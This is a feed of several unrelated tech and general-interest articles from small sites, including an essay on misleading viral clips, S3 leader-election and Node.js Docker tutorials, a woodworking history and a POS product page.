    Another, but much briefer, viral video was based on a part of a sentence said by another congressperson, Rep. Ilhan Omar. I’m not going to put these videos up since unlike the other clips they are mostly the sentence fragment plus other story turning images not necessarily related to what Omar said.  But it’s interesting to look at where the attention came from.

    When Omar said “some people did something” in connection to the 9/11 attacks, she drew lots of negative attention, including the creation of that viral video. But what was the full sentence? What was the full speech?

    “CAIR was founded after 9/11 because they recognized that some people did something and that all of us were starting to lose access to our civil liberties.”

    It was a mistake for a public figure to speak carelessly about a topic like 9/11, even in the year 2019. But the number of times Omar uses the words “some,” “someone,” “something,” is interesting. I came away from reading the transcript thinking that she’s just a poor public speaker. That might have put her at greater risk from someone making the clip. Here’s the full transcript.

    The Smirk

    Another incident spread online was “the smirk,” or the way a group of high school boys was shown to be antagonizing a Native American man. The name “the smirk” came from the look on one of the boy’s face (Nick Sandman) as he looked on.

    The main actors in this clip exchange no words. Fascinating, I think.

    This is an event I did see as it unfolded on social media. It was awful. The first clip showed what seemed to be despicable behavior. And it looked like everyone online agreed, including the boys’ school which publicly apologized for their behavior.

    The more I read from alums of Covington catholic about the abuse, bullying and cruelty there, the more I come to believe that the students thuggish behavior is a feature of the school, not a symptom. Just like with all Trumpism – based on bullying, arrogance, and hatred.

    — Kurt Eichenwald (@kurteichenwald) January 20, 2019

    And to all you aggrieved folks who thought this Gillette ad was too much bad-men-shaming, after we just saw it come to life with those awful kids and their fetid smirking harassing that elderly man on the Mall: Go fuck yourselves. https://t.co/ab7zqIuWbL

    — Kara Swisher (@karaswisher) January 19, 2019

    About two days later, the clip flipped. The cause of the flip? Enough people went beyond the clip and watched the entire video. I don’t think many people originally thought that there was an more complete video.

    After viewing the longer video, Swisher would later apologize for what she said. Many others would apologize too.

    I was a complete dolt to put up this and several other obnoxious tweets yesterday without waiting to see the whole video of the incident and I apologize to the kids from Kentucky unilaterally and also for using that clip to make another point about, of all things, a razor ad.

    — Kara Swisher (@karaswisher) January 21, 2019


    But why the need to even have, and share, an opinion of the clip? Could we have taken the clip as first interpreted as true and also not worthy of attention or outrage?

    Everyone posturing on this terrible website has done stupid, foolish, ignorant and downright horrible things that they surely regret as teenagers and were just fortunate enough to grow up in a world where 99% of people didn’t carry networked cameras.

    — Byron Tau (@ByronTau) January 19, 2019

    In the past, it didn’t matter. There was as much history but there were fewer clips.

    Aftermath: Nick Sandman and team are suing news outlets for $275M for the way they propagated a false story, including calls for him to be injured.

    Causes of The Clip

    In the early days of the web people thought that access to diverse, international, viewpoints would lead to less biased information. That was a too simplistic view. There are too many causes of the clip for this behavior to disappear.

    The clip is here to stay. Here are some reasons.

    Fitting a story to a situation. This is similar to Richelieu’s (supposed) quote on inventing a story to fit a need. When we fit a story to a situation, we have a likely story in mind and then see a clip that aligns with the story. Just the clip is enough to confirm our belief in the story.

    Biases. If we see what looks like people behaving poorly (or well) and fitting into our expectations, we’re more likely to accept the clip and move on, like the Owens – Lieu examples.

    Time. To truly dig into each story takes too much time to be worth it. How interested are we in finding something closer to the truth? Shouldn’t we trust in others with authority (or the overall market) to show us what is true? New distractions arise constantly. Why spend time digging into this one? That’s the case in each of the above clips.

    Speed. The speed at which a story can evolve online requires effort to keep up to date. The speed at which a story can be shared and promoted lets one top story take over your awareness. By the time a clearer story emerges, we have already moved on to the next one.

    Cameras and Distribution. As a photographer, I’ve long known that you can tell different stories of the same event depending on how you position your camera lens. Afterward, when all that physically remains are the pictures, the best known images get to tell the story. Again, that hits each of the above clips hard.

    No responsibility. There is often little or no downside to weighing in publicly with incomplete information. Or, the potential for any downside, such as the Sandman lawsuit, is worth risking given the upside of status and supportive business models.

    Business models. Media transitioned from subscription based to ad-based. That means that having spikes in traffic, as outrages with a story produce, increase media company revenues. That means that baked into the new media business model is the risk of future downside from spreading information before it is verified. It’s a spikier up and down business cycle, but one that seems unavoidable.

    A thought. Perhaps the future of deep fakes will save us from the clip. When anything can be faked realistically, should we trust anything?

    ]]>
    https://unintendedconsequenc.es/the-clip/ hacker-news-small-sites-43226598 Sun, 02 Mar 2025 02:35:45 GMT
    <![CDATA[Learning C# and .NET after two decades of programming]]> thread link) | @Kerrick
    March 1, 2025 | https://kerrick.blog/articles/2025/why-i-am-learning-c-sharp-and-dot-net-after-two-decades-of-programming/ | archive.org

    A photo of a net

    I’ve been programming for over two decades, and I can’t make a full-stack enterprise web application.


    The first lines of code I wrote were in GW-BASIC. When I was in eighth grade, I enrolled in a typing class. Students who finished their typing practice before class ended were given an extra credit opportunity: copying program source code. It was a fantastic test of applied accuracy, and I gladly participated. Eventually I started to pick up on some of the patterns I saw in those BASIC programs. I came up with my own programs—mad libs and simple calculators—and fell in love. I still couldn’t make a web site.

    In high school, the library had a book about HTML. I made my first web pages, and my math teacher helped me put them online. I got a job bagging groceries to pay for a laptop, and used that laptop to develop simple web sites for local businesses. These were the first times I was ever paid to write code, and I was hooked. I still couldn’t make a rich web site.

    When I got to college I learned JavaScript from another book, and CSS from blog posts and documentation web sites. Before I left college I took a job with the Web Design & Support department, implementing a major redesign of the school’s entire web site in HTML and CSS, with a splash of jQuery for interactivity. I still couldn’t make a web application.

    After I left college I scraped together a meager living making Chrome extensions, writing Ruby for freelance clients, and working part-time at Best Buy. I still couldn’t make an enterprise web application.

    By 2013 I had my first career job as a front-end developer at an enterprise Software as a Service business. Thanks to EmberJS, an amazing product team, a top-notch architect, and leadership that understood lean software, I built the front-end of our new platform that, over the next seven years, would become so successful that I’d take on brilliant apprentices, build a team, grow to Engineering Manager, and become Director of Software Engineering. But I still couldn’t make a full-stack enterprise web application.

    When that company got acquired, I laid off half of my team and lost a part of myself. I could no longer stomach working in management, so I left. I had my mid-life crisis: I moved to the country, bought a farm, went back to college online, and tried to create a startup. I realized I was drifting, and that what I wanted was a steady stream of programming work on a great team. I found exactly that, thanks to the CTO of my previous employer. I am now responsible for improving and maintaining an enterprise Angular application powered by a C# / .NET back-end. It’s a bit rough around the edges, but I tidy as I go. I’m the only purely-front-end programmer on a team of twelve. I ship features our customers love, I help the team improve our processes, and I improve the existing legacy Angular application. But I still can’t make a full-stack enterprise web application.


    Last quarter, I learned that our next front-end will use Blazor, not Angular. This means it will use C#, not TypeScript. This quarter, my manager gave the gift of time. Every hour I’m not fixing urgent bugs or implementing important features, he encouraged me to spend learning C#, .NET, and Blazor. The company paid for an O’Reilly Learning Platform subscription, and I’ve collected a list of books to study at work. I’ll still spend my nights and weekends improving at my craft, but instead of learning Ruby on Rails, I’ll be reading generally-applicable books: Patterns of Enterprise Application Architecture, Domain-Driven Design, Working Effectively with Legacy Code, Object-Oriented Analysis & Design with Applications, Data Modeling Essentials, and Designing Data-Intensive Applications.

    I’ll blog and toot about what I learn as I go, and I hope you’ll join me. I’m learning C# and .NET, but starting from two decades of programming experience and a decade of software engineering experience. I’m learning web development, but starting from a deep knowledge of HTTP, browsers, and the front-end. I’m learning architecture and object-orientation, but starting from a background in structured and functional programming.

    The only thing I love more than learning is my wife. I can’t wait for this learning journey, and I’m excited to share what I learn. Subscribe to my email list and perhaps you’ll learn something too.

    Get notified when I publish new articles

    Get notified when I post new articles. Privacy policy applies.

    ]]>
    https://kerrick.blog/articles/2025/why-i-am-learning-c-sharp-and-dot-net-after-two-decades-of-programming/ hacker-news-small-sites-43226462 Sun, 02 Mar 2025 02:15:18 GMT
    <![CDATA[Leader Election with S3 and If-Match]]> thread link) | @pierremenard
    March 1, 2025 | https://quanttype.net/posts/2025-02-25-leader-election-with-s3-and-if-match.html | archive.org

    Let’s implement leader election using Amazon S3’s If-Match condition by building a distributed lock with it.

    In August 2024, Gunnar Morling published a blog post that shows how to do it with the If-None-Match condition. Back then, If-Match had not yet been released. This post shows another way to solve the same problem.

    The post is intended to stand on its own so you don’t need to read Gunnar’s post first. But do read it as well to see how the solutions compare!

    What’s If-Match

    PutObject is the API call that you use to upload data to Amazon S3. By default, the PutObject calls are upserts: they will replace the object contents or create an object if one does not already exist.

    In 2024, Amazon introduced two conditions for the PutObject calls If-Match (announcement) and If-None-Match (announcement). They allow you to restrict the behavior in the following ways:

    • If you set If-None-Match: *, the call will only succeed if the object does not already exist.
    • If you set If-Match: <value>, the call will only succeed if the object exists and its content has the matching entity tag (ETag) value. Entity tag is essentially checksum for the object content.1

    DeleteObject also takes the If-Match condition, so you can delete an object only if it has matching ETag.

    If the call fails, you’ll get a 412 error response (or, in some cases, another 4xx error).

    Together with S3’s consistency guarantees these conditions allow you to do compare-and-swap (CAS) operations. They are a key building block for distributed systems.

    What’s leader election?

    Many distributed systems require designating one of the nodes as the leader. Typically the leader accepts the write requests from the clients and then sends them to the other nodes that process read requests.

    How do the nodes choose the leader? Martin Kleppmann in Designing Data-Intensive Applications writes:

    One way of electing a leader is to use a lock: every node that starts up tries to acquire the lock, and the one that succeeds becomes the leader.

    If we can build a distributed lock, we can perform leader election. Let’s see how to do that on S3.

    The locking protocol

    We will use a single object in the bucket for locking. Let’s call it lock. It will be a JSON blob that looks like this:

    {
      "expires_at": 1740151473.206179
    }
    

    Here expires_at is a timestamp in seconds since the UNIX epoch for when the lock expires.

    To acquire the lock, the nodes do the following.

    1. Read the contents of lock. If the object does not exist, there’s no lock and we can jump to step 3.
    2. If expires_at is in the past, the lock has expired and we can continue. Otherwise acquiring the lock has failed.
    3. Put a new version of lock with the desired expiration time and with one of the conditions:
      • If lock existed in step 1, use If-Match with its ETag value.
      • If lock did not exist in step 1, use If-None-Match.

    If the put in step 3 succeeds, the node has acquired the lock.

    S3 has strong read-after-write consistency, so if there is a lock, in step 1 every node is guaranteed to see up-to-date version of the lock data. In step 3, the use of the conditions guarantees that only one node will succeed at acquiring the lock.

    If the leader wants to release the lock, it can delete the object using If-Match with the ETag value received in step 3.

    Fencing tokens

    The elephant in the room is that this relies on the nodes having their clocks in sync, which is a famously difficult problem. Consider what happens if the leader’s clock is behind the others or the clock of one of the secondaries is ahead the others: the leader thinks it still holds the lock while the secondary thinks it has expired. If the secondary now grabs the lock, the former leader can end up issuing zombie requests.

    In his post How to Distributed Locking, Martin Kleppman explains that you can use fencing tokens to solve the issue. Fencing token is a number that increases every time a node acquires the lock. The token should then be included in the requests to the system that we hold the lock over, and it should track the highest token it has seen and reject the requests with lower tokens. This filters out the zombie requests.

    In our case, even expires_at could work as a fencing token if the lock duration is always the same. The protocol guarantees that it will always increase.

    However, we do not have to make the lock duration fixed. We can add another field token to the JSON object:

    {
      "expires_at": 1740151473.206179,
      "token": 1
    }
    

    token is a number, starting at zero, that should be incremented every time the lock is acquired. The node acquiring the lock reads it in step 1 and it can increase it in step 3.

    Releasing the lock by deleting object does not work anymore as that would reset the token. You can release the lock by setting expires_at to zero without incrementing token.

    {
        "expires_at": 0,
        "token": 1
    }
    

    Python implementation

    Here’s a basic implementation in Python using boto3. Adding support for the fencing tokens and releasing the lock is left as an exercise for the reader.

    import dataclasses
    import json
    from dataclasses import dataclass
    from datetime import UTC, datetime, timedelta
    from typing import TYPE_CHECKING, Self
    
    import boto3
    import botocore.exceptions
    
    if TYPE_CHECKING:
        from mypy_boto3_s3.client import S3Client
    
    s3_client: "S3Client" = boto3.client("s3")
    
    
    @dataclass(frozen=True)
    class LockData:
        expires_at: float
    
        def to_json(self) -> str:
            return json.dumps(dataclasses.asdict(self))
    
        @classmethod
        def from_json(cls, data: str) -> Self:
            return cls(**json.loads(data))
    
    
    def acquire_lock(
        s3_client: "S3Client",
        bucket: str,
        key: str = "lock",
        expires_in: timedelta = timedelta(seconds=60),
    ) -> bool:
        """Try to acquire a lock using S3 as the coördination mechanism.
    
        Args:
            s3_client: boto3 S3 client
            bucket: S3 bucket name
            key: S3 object key
            expires_in_seconds: Lock timeout
    
        Returns:
            bool: True if the lock was acquired, False otherwise
        """
    
        try:
            existing_lock = s3_client.get_object(
                Bucket=bucket,
                Key=key,
            )
        except botocore.exceptions.ClientError as e:
            if e.response["Error"]["Code"] == "NoSuchKey":
                existing_lock = None
            else:
                raise
    
        if existing_lock is not None:
            existing_data = LockData.from_json(existing_lock["Body"].read().decode("utf-8"))
    
            if datetime.now(UTC).timestamp() <= existing_data.expires_at:
                return False
    
            condition = {"IfMatch": existing_lock["ETag"]}
        else:
            condition = {"IfNoneMatch": "*"}
    
        lock_data = LockData(expires_at=(datetime.now(UTC) + expires_in).timestamp())
    
        try:
            s3_client.put_object(
                Bucket=bucket,
                Key=key,
                Body=lock_data.to_json(),
                **condition,  # type: ignore[arg-type]
            )
        except botocore.exceptions.ClientError as error:
            if error.response["Error"]["Code"] in (
                "ConditionalRequestConflict",
                "PreconditionFailed",
            ):
                # We could alternatively retry on ConditionalRequestConflict (409)
                return False
            raise
    
        return True
    

    Here’s another exercise for the reader: The lock object does not include information about who is holding the lock as it’s not necessary for the protocol. However, it would be handy in a real-world implementation in case you ever need to debug this.

    Does this make sense?

    What’s nice about this compared to Gunnar’s version is that there’s no need for a background process to delete the stale lock objects. Gunnar’s design creates a new object every time a lock is acquired but in this version, there’s only a single object that gets modified.

    However, with both designs you have to ask whether they make sense in the real world. As I’ve mentioned before, while S3 storage is fairly inexpensive, the requests are not cheap: in the standard tier and us-east-1 region, PUTs cost $0.005 per 1000 requests and GETs cost $0.0004 per 1000 requests. The latencies are in double-digit milliseconds. S3 Express One Zone makes the requests only 2x cheaper, so it does not materially change the situation.

    This means that if you’re looking to build a high-performance, low-cost distributed lock, S3 is not going to be your first choice. You would probably use it because you’re already using S3 for something else and you want to hold a lock over S3 resources. Unfortunately S3 does not support fencing tokens for PutObject calls, which limits the usefulness of this approach.

    This is a companion post for my lightning talk Why S3’s conditional writes made people excited at HYTRADBOI that shows how to use If-None-Match. It presents an idea similar to Gunnar’s and to what Delta Lake uses in practice.

    Talk errata: The error response for failing condition is 412, not 421 as claimed in the talk.

    Thanks to Joel Kaasinen, Juuso Takalainen, Iivari Äikäs, Waltteri, and Rishit for giving feedback on the talk and thanks to Joel Kaasinen for feedback on this post. Any mistakes are my own.

    Photos: The first one shows a rock and a tree at the frozen Lake Meiko in Kirkkonummi, Finland on a cloudy winter day. The second one is a cliff at Vepsu, a small island in the sea in front of Hamina, Finland.

    ]]>
    https://quanttype.net/posts/2025-02-25-leader-election-with-s3-and-if-match.html hacker-news-small-sites-43226258 Sun, 02 Mar 2025 01:48:52 GMT
    <![CDATA[On-Demand Docker Containers with Node.js]]> thread link) | @codehammer
    March 1, 2025 | https://www.hammerbot.fr/en/articles/on-demand-containers-with-nodejs | archive.org

    descriptive text

    Have you ever wondered how Google Cloud Run magically scales your services down to zero and still manages to respond to incoming requests instantly? It feels like serverless magic, but under the hood, it's powered by Knative —a technology that lets Kubernetes dynamically start and stop containers on demand.

    Wouldn’t it be awesome to build something like that ourselves?

    Today, we’re going to roll up our sleeves and create a Node.js-powered on-demand container system. 💡 We’ll:

    ✅ Start a container only when needed

    ✅ Forward incoming requests to it

    Auto-stop the container after inactivity

    ✅ Handle errors gracefully

    Let’s go! 🚀


    Notion Image

    Step 1: The Simplest Server in a Container 🛠️

    First, let’s create a tiny HTTP server that will run inside our container.

    📄 server.js

    import http from "http";
    
    const hostname = "0.0.0.0";
    const port = 3000;
    
    const server = http.createServer((req, res) => {
      res.statusCode = 200;
      res.setHeader("Content-Type", "text/plain");
      res.end("Hello from your on-demand container!\n");
    });
    
    server.listen(port, hostname, () => {
      console.log(`Server running at http://${hostname}:${port}/`);
    });
    

    javascript

    Now, let’s dockerize it.

    📄 Dockerfile

    FROM node:22
    WORKDIR /app
    COPY ./server.js ./server.js
    CMD ["node", "server.js"]
    

    plain text

    Build the image:

    docker build . -t simple-server:local
    

    shell


    Step 2: The Magic—Dynamically Starting a Container 🎩✨

    Now, let’s write a script that:

    • Listens for HTTP requests
    • Checks if the container is running
    • Starts it if needed
    • Forwards requests to the container

    📄 index.js

    import http from "node:http";
    import { proxyRequest, isPortOpen, startContainer, stopContainer } from "./utils.js";
    
    const CONTAINER_PORT = 8080;
    const INACTIVITY_TIMEOUT = 30_000; // 30 seconds
    let lastRequestTime = Date.now();
    let containerRunning = false;
    
    const httpServer = http.createServer(async (req, res) => {
      console.log("➡️ Incoming request detected...");
      lastRequestTime = Date.now();
    
      if (!(await isPortOpen(CONTAINER_PORT))) {
        console.log("🚀 Container is not running. Starting it now...");
        await startContainer();
        containerRunning = true;
      }
    
      console.log("🔁 Forwarding request to container...");
      return proxyRequest({ req, res, port: CONTAINER_PORT, host: "localhost" });
    });
    
    // Periodically check for inactivity
    setInterval(async () => {
      if (containerRunning && Date.now() - lastRequestTime > INACTIVITY_TIMEOUT) {
        console.log("🛑 No activity detected. Stopping container...");
        await stopContainer();
        containerRunning = false;
      }
    }, 5_000); // Check every 5 seconds
    
    httpServer.listen(3000, "127.0.0.1", () => {
      console.log("🌐 On-Demand Proxy Server listening on http://127.0.0.1:3000");
    });
    

    javascript


    Step 3: Container Management Functions 🏗️

    📄 utils.js

    import { spawn, exec } from "node:child_process";
    import net from "node:net";
    
    export function startContainer() {
      return new Promise((resolve) => {
        const process = spawn("docker", ["run", "--rm", "-p", "8080:3000", "simple-server:local"], {
          stdio: "inherit",
        });
        process.on("spawn", resolve);
      });
    }
    
    export function stopContainer() {
      return new Promise((resolve, reject) => {
        exec("docker ps -q --filter ancestor=simple-server:local", (err, stdout) => {
          if (err) return reject(err);
          if (!stdout.trim()) return resolve(); // No container found
    
          exec(`docker stop ${stdout.trim()}`, (err) => {
            if (err) return reject(err);
            console.log("✅ Container stopped.");
            resolve();
          });
        });
      });
    }
    
    export function isPortOpen(port, host = "127.0.0.1") {
      return new Promise((resolve) => {
        const socket = new net.Socket();
    
        socket.setTimeout(1000);
        socket.once("connect", () => {
          socket.destroy();
          resolve(true);
        });
        socket.once("timeout", () => {
          socket.destroy();
          resolve(false);
        });
        socket.once("error", () => {
          socket.destroy();
          resolve(false);
        });
    
        socket.connect(port, host);
      });
    }
    

    javascript


    Step 4: Time for a Test 🧪

    Fire up your Node.js proxy server:

    node index.js
    

    shell

    Then, make a request:

    curl http://localhost:3000
    

    shell

    🎉 You should see the container start up, handle the request, and return:

    Hello from your on-demand container!
    

    plain text

    Wait 30 seconds without sending requests, and check the logs—you’ll see:

    🛑 No activity detected. Stopping container...
    ✅ Container stopped.
    

    plain text

    Now, try the request again, and watch it restart automatically!


    🚀 Wrapping Up

    We've built a simple but powerful system that: ✅ Dynamically starts a container when needed

    Forwards HTTP requests to the container

    Stops the container after a period of inactivity

    Handles errors properly and avoids unnecessary resource usage

    This is a lightweight alternative to serverless environments like Cloud Run but running on your own infrastructure.

    👉 Want more? Let me know in the comments! We could:

    • Improve startup time using container warm-up techniques 🥶➡️🔥
    • Implement multiple containers for high availability 💪
    • Use WebSockets for real-time interactions 📡

    Thanks for reading! 🚀


    ]]>
    https://www.hammerbot.fr/en/articles/on-demand-containers-with-nodejs hacker-news-small-sites-43226113 Sun, 02 Mar 2025 01:23:31 GMT
    <![CDATA[Mozilla site down due to "overdue hosting payments" [fixed]]]> thread link) | @motownphilly
    March 1, 2025 | https://linuxmom.net/@vkc/114089626244932902 | archive.org

    Unable to extract article]]>
    https://linuxmom.net/@vkc/114089626244932902 hacker-news-small-sites-43226089 Sun, 02 Mar 2025 01:20:17 GMT
    <![CDATA[I'm done with coding]]> thread link) | @neelc
    March 1, 2025 | https://www.neelc.org/2025/03/01/im-done-with-coding/ | archive.org

    In my high school days, I was a huge server and networking person. My homelab was basically my identity, and not even a good one: consumer-level networking gear running Tomato and a then-7-year-old homebuilt desktop PC running FreeBSD.

    Then I joined NYU’s Tandon School of Engineering for Computer Science. It was a full 180 into software engineering. I didn’t just code for assignments, I started with toy projects and went to major Tor contributions writing very complex patches, had two internships and ultimately a job at Microsoft.

    Primarily due to “Big Data” experience at NYU CUSP, Microsoft placed me on the Viva Insights team. I’ve always hated the product, feeling it was unnecessary surveillance. I wanted out.

    In fact, the disdain of Viva Insights was big enough to make me lose passion for coding and get into obsessive browsing and shopping because facing the music of working on a surveillance product would bother me even more. Open source work outside of package maintenance went to zero.

    I’ve tried to discuss this with my mom, and she kept telling me how “lucky” I am for working at Microsoft saying “it’s big tech” and “you’re neurodivergent” and “you won’t survive at a smaller company.” She even bought into the marketing material telling me how it’s “not surveillance.”

    I’ve decided that in the shitty job market, it’s not worth being a software engineer even if I make much less. Part of it is being “specialized” in over-glorified surveillance so even if I change employers, what’s the guarantee I won’t be working on another surveillance product. Assuming I can even get another job.

    In fact, I’ll just live off dividend income and try to get my new IT startup Fourplex off the ground. Sure, I won’t be able to buy shiny homelab equipment as often as I did in the past, but I at least have the guarantee I’m not working on an unethical product.

    While six figures is certainly nice, it’s only nice if it’s ethically done. I’d much rather flip burgers or bag groceries than work on surveillance for six figures. After all, Edward Snowden had a “stable” federal government job (not so stable now thanks to “DOGE”) and he gave it up to stand up for the right to privacy.

    And I care more for my values than the name or salary. It’s not like I use Windows at home, I haven’t since 2012. I kept self-hosting email despite having worked at Microsoft 365 and still do even now. And I sacrificed job performance for my values of strong privacy.

    Little did I know that my father (who was previously a big Big Data and AI advocate) would come out to hate Viva Insights. He says it’s “bullshit” and nobody uses it. Even when I worked at Microsoft I never used it. Not even once. It’s bloatware. Microsoft is 100% better off porting Office apps to Linux (despite me using a Mac now) or beefing up cybersecurity.

    ]]>
    https://www.neelc.org/2025/03/01/im-done-with-coding/ hacker-news-small-sites-43225901 Sun, 02 Mar 2025 00:49:27 GMT
    <![CDATA[The Planemaker Who Walked Beneath the Water]]> thread link) | @unix2038
    March 1, 2025 | https://workingwoodenplanes.com/p/2025-02-28-ebenezer-clifford-bell-diver-planemaker/ | archive.org

    The pages of A Guide to American Wooden Planes are filled with the biographies of planemakers who worked in wildly varying professions, from music teachers to mail clerks. But I know of no other planemaker with a resume like Ebenezer Clifford, architect, master joiner, bell diver, cabinetmaker, turner, justice of the peace, and quartermaster sergeant in the Revolutionary War.

    Born on Oct. 29, 1746 into a family of carpenters, Clifford lived the first half of his life in Kensington, New Hampshire. By the time he was in his 20s, he was likely a well-known joiner. A paneled room he is said to have built in 1774 was eventually purchased by the Metropolitan Museum of Art, dismantled, and displayed in its American Wing. (The New York Times called it “one of the best examples of early American paneling in existence.”) At the outbreak of the Revolutionary War in 1775, he enlisted in the 2nd New Hampshire Regiment and possibly took part in the siege of Boston. He served as quartermaster sergeant until he left the army in 1777. 1

    Ebenezer Clifford's joinery work in the stair hall of the Governor John Langdon House in Portsmouth, New Hampshire. Photo: Historic New England.

    When he got home, he went straight back to work as a joiner. In 1777, he built a staircase for a Deerfield farmer, charging £1-8-0 for his time, another £2-9-0 for “my servt” (likely an apprentice), and another £1-11-0 for turning 31 balusters. Clifford bought two “Cornish [crown molding] irons” and a “Cornish bed mold Plain Iron” in 1784 when he worked as a joiner on the stair hall in the Governor John Langdon Mansion. (He served as a justice of the peace for Rockingham Co., Mass. that same year.) The volume of wood he was purchasing at the time — “1,600 board feet of cherry, 900 feet of maple, and 900 feet of birch” in 1788 and 1789 — speaks to his output as a cabinetmaker. In 1788, he sold a “Cherrytree” clock case, a “Mahogany Stand Table,” six chairs, and an 18-inch “Mahogany Teaboard.” His surviving planes are all from this time period. A local blacksmith’s account books shows him buying more than 200 plane irons between 1772 and 1794.2

    Clifford moved to Exeter, New Hampshire, in 1793, and began focusing on more than construction. (His personal library at the time included architectural books like the 1756 edition of Plans, Elevations, And Sections, Of Noblemen And Gentlemen’s Houses.) He designed, or co-designed with builder-architect Bradbury Johnson, a number of buildings that still stand. They both worked as master joiners for the Phillips Exeter Academy in 1794, with Clifford being paid £234-16-11. Clifford designed the building and Johnson designed the cupola. Both men are credited with planning the Congregational Church in Exeter in 1798. Either Johnson or Clifford worked as the master joiner for the Samuel Tenney House in 1800. The only known building whose design can be solely credited to Clifford is the Atkinson Academy, built in 1803 when he was 57 years old.3

    It was around this time Clifford’s interests turned to sub-marine exploration. He used a diving bell to salvage silver coins from a shipwreck at the Isles of Shoals, about six miles off the coast of New Hampshire in the Atlantic Ocean. It’s unknown what vessel the coins came from, but the money had been submerged long enough that it was encrusted with marine life. In 1803, Clifford and Richard Tripe of Dover tried to raise a sunken gundalow (a type of sailing barge) on the Piscataqua River. They made 12 dives in their bell, attaching cables to the hull of the barge in 72 feet of water. Unfortunately, a ship collided with the cables, shattering the barge’s hull. 4

    An 18th century diving bell.

    The salvage was a failure; they were only able to bring up a few iron bars from the ship’s cargo. But Clifford enjoyed his time underwater. His chronic rheumatism was so improved by the increased pressure at the bottom of the river that he was able to walk six miles after a dive. The bell was 5-feet 9-inches tall and 5 feet across at the base, with two seats and a footrest made from an anchor. With their signal buoy — a full-size hand-carved wooden swan — floating above them, the men were slowly lowered to the bottom over the course of 20 minutes. As they probed the river bottom, fish gathered around them like “a flock of chickens.” 5

    In 1808, Clifford and Samuel Palmer of Milton received permission from the state of Massachusetts to conduct salvage operations on the Penobscot River where the British had sunk 44 American ships during the Revolutionary War. Palmer was no stranger to diving bells. He had unsuccessfully tried to raise sunken cargo in the Portsmouth River and a lake. Over the next few years, they retrieved “36 pieces of cannon, a brass howitzer, and several tons of cannon balls.” In 1810, the state paid the men $2,078.84 for the metal (about $53,700 today). 6

    When Clifford began working on the Penobscot River, Tripe, his original diving partner, sued. Tripe had received a patent (Improvements in Diving Machines, #681) on April 1, 1806, for an apparatus that provided air to a diving bell. In his lawsuit, he claimed Clifford had used his invention. The outcome of the case is unknown. Confusingly, a story ran in the Boston Centinel in 1810 (and was subsequently reprinted in newspapers in Pennsylvania, Maryland and North Carolina) crediting Clifford, not Tripe, for having “invented an improved [and] ingenious Diving Bell, of a new construction.” Clifford may have been involved with salvage efforts after 1810. An 1811 article in a New York City newspaper described ongoing work by a “Mr. Palmer” and “the company who own the Diving Bell” to raise parts of the wrecked British frigate Hussar in the East River.7

    Following several years of declining health, Clifford died on October 10, 1821, at the age of 74. A state legislator recalled his father attending an auction in 1878 at the old Clifford home “when the last of the fourth generation of cabinetmakers sold the place.” His account includes this heartbreaking detail: “A farmer bought their old planes and tools for firewood, many of them then over 100 years old — he had to go twice with a two horse wagon to haul them home.”8


    A Brass Ribbon Plow Plane

    Ohio Tool plow plane with a brass ribbon on its side

    This is the first time I’ve seen this kind of decoration on a plane, and I’d love to know if anyone has ever spotted something similar. (You can reply to this email or find other ways to contact me here.) It was made by the Ohio Tool Co., with a G. Baurmann, Louisville, Kentucky mark. I don’t believe Ohio Tool ever offered a plane with brass decorations, so I assume it was put on by Baurmann.

    Gustave Baurmann (1817-1884) was a Louisville, Kentucky, hardware, cutlery, and gun dealer. He was born in Prussia and immigrated to the United States as a young man. He was part of several hardware partnerships, eventually opening his own business — G. Baurmann & Co. — in 1854. After the end of the Civil War, Baurmann hired local architect Henry Whitestone to design a store for him at 741 West Main St., as well as a spacious 14-room home on Market St. In 1870, he owned $40,765 worth of property in the city. Louisville was home to a large German community in the 1800s. Baurmann took an active part in it, including serving as the treasurer for the local opera house. He sold his business to Harvey, Girdler & Co. in 1872; two years later he put his house up for sale and traveled to Europe. The 1880 federal census lists six Baurmann children, three girls and three boys, aged 9-20. Baurmann died in 1884 and is buried in Louisville’s Cave Hill Cemetery.


    ]]>
    https://workingwoodenplanes.com/p/2025-02-28-ebenezer-clifford-bell-diver-planemaker/ hacker-news-small-sites-43225805 Sun, 02 Mar 2025 00:34:57 GMT
    <![CDATA[POSimple]]> thread link) | @scologic
    March 1, 2025 | https://posimple.net/index.php | archive.org

    POSimple: The Smarter Way to Manage Sales,
    Compliance & Growth
    .

    Built for modern businesses across retail, hospitality,
    events and regulated industries.

    POSimple adapts, scales, and simplifies operations
    without the hidden costs.

    Fast setup, real-time analytics, and built-in compliance

    Welcome to POSimple:

    Simplify. Scale. Succeed.

    The All-in-One EPOS Solution built for performance, growth, and seamless business management.

    At POSimple, we believe technology should make running your business easier—not more complicated. Designed by industry experts, our customizable, cloud-based EPOS software delivers the tools you need to sell smarter, scale effortlessly, and stay ahead of the competition. Whether you're managing a single store, a multi-location franchise, or a dynamic hospitality venue, POSimple is the reliable partner you can count on.

    • 99.9% Uptime – Keep operations running smoothly, no interruptions.
    • Sell Anywhere, Anytime – Manage in-store, online, and mobile sales effortlessly.
    • Built for Your Industry – Retail, hospitality, ticketing, and more—POSimple adapts to you.

    Smarter EPOS. Seamless Transactions. Unmatched Reliability.

    POSimple, where simplicity meets performance.

    Designed for retail, hospitality, and multi-location businesses, our customizable, cloud-based EPOS system ensures effortless sales, compliance, and business growth—all with transparent, affordable pricing.

    Powerful Features, Simple Execution - Fast, Flexible & Secure EPOS, Sell In-Store, Online & Across Locations

    An All-in-One or Customizable EPOS System that Scales with You

    POSimple is designed to simplify operations, enhance efficiency, and drive business growth. Whether you need an out-of-the-box solution or a fully customizable system, POSimple adapts to your business needs, giving you complete control.

    Integrated Payments

    Accept contactless, chip & pin, and mobile payments with transparent, low transaction fees.

    Live Sales & Inventory Tracking

    Gain real-time insights into stock levels and sales performance.

    Cloud-Based Multi-Location Management

    Monitor and manage operations across multiple sites with ease.

    A powerful, scalable, and future-ready EPOS system that works for you.

    Compliance & Security – Built In

    POSimple ensures businesses meet industry regulations with built-in compliance tools.

    Fiscal Compliance for Regulated Markets

    POSimple is compliant with fiscal regulations in Germany, France, Italy, and other countries requiring fiscal controls—unlike many competitors that cannot operate in these regions.

    Age Verification & ID Check

    Fully integrated compliance solutions for vape shops, liquor stores, and other age-restricted sales.

    Food Labeling & Allergen Compliance

    Meets Natasha’s Law requirements, providing built-in allergen and ingredient labeling tools for food businesses.

    Why POSimple?

    Sell Anywhere with Omnichannel EPOS

    POSimple unifies your business across multiple channels, ensuring seamless operations for in-store, online, and mobile sales.

    • All-in-One EPOS Solution – Handle sales, payments, inventory, and compliance with ease.
    • Scalable & Customizable – Adapt POSimple to your business, from single shops to multi-site franchises.
